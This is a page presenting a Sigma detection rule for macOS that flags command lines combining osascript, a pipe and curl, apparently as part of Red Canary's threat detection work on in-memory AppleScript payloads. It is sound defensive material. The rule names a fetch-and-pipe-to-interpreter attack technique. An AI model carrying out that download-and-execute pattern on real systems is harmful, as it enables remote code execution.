In-memory Downloading and Compiling of Applets as Payloads
This analytic uses a single ES_EVENT_TYPE_NOTIFY_EXEC event and looks for the the execution of curl, |, or osacompile commands. Part of the RedCanary 2024 Threat Detection Report.
Sigma rule (View on GitHub)
1title: In-memory Downloading and Compiling of Applets as Payloads
2id: 75933b00-4949-4cf0-a0e0-f234c3ff1407
3status: experimental
4description: |
5 This analytic uses a single ES_EVENT_TYPE_NOTIFY_EXEC event and looks for
6 the the execution of curl, |, or osacompile commands. Part of the RedCanary
7 2024 Threat Detection Report.
8references:
9 - https://redcanary.com/threat-detection-report/techniques/applescript/
10author: RedCanary, Sigma formatting by Micah Babinski
11date: 2024/03/21
12tags:
13 - attack.execution
14 - attack.t1059
15 - attack.t1059.002
16logsource:
17 product: macos
18 category: process_creation
19detection:
20 selection:
21 CommandLine|contains|all:
22 - 'osascript'
23 - '|'
24 - 'curl'
25 condition: selection
26falsepositives:
27 - Unknown
28level: low```
References
-
Adversaries continue to abuse macOS’s native scripting interpreter, AppleScript, to automate malicious activity and call native APIs.
Read More
Related rules
- Mac AppleScript Input Prompt
- Suspicious Execution via macOS Script Editor
- Bypassing Security Controls - Command Shell
- Obfuscated Commands - Command Shell
- Obfuscation and Escape Characters - Powershell